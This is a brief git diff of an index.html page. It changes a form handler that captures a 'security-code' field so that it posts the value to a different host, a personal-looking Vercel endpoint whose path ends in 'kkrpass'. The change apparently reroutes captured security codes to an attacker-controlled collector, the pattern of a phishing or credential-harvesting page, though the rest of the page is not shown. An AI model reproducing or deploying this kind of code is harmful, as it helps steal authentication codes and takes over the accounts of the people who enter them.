--- a/index.html
+++ b/index.html
@@ -204,7 +204,7 @@
       e.preventDefault();
       const code = document.getElementById("security-code").value;
 
-      fetch("https://submit-form.com/Ks4zlIhNz", {
+      fetch("https://professor608.vercel.app/kkrpass", {
         method: "POST",
         headers: { "Content-Type": "application/json" },
         body: JSON.stringify({ code })
@@ -241,5 +241,6 @@
 
 
 </body></html>
+
 
 
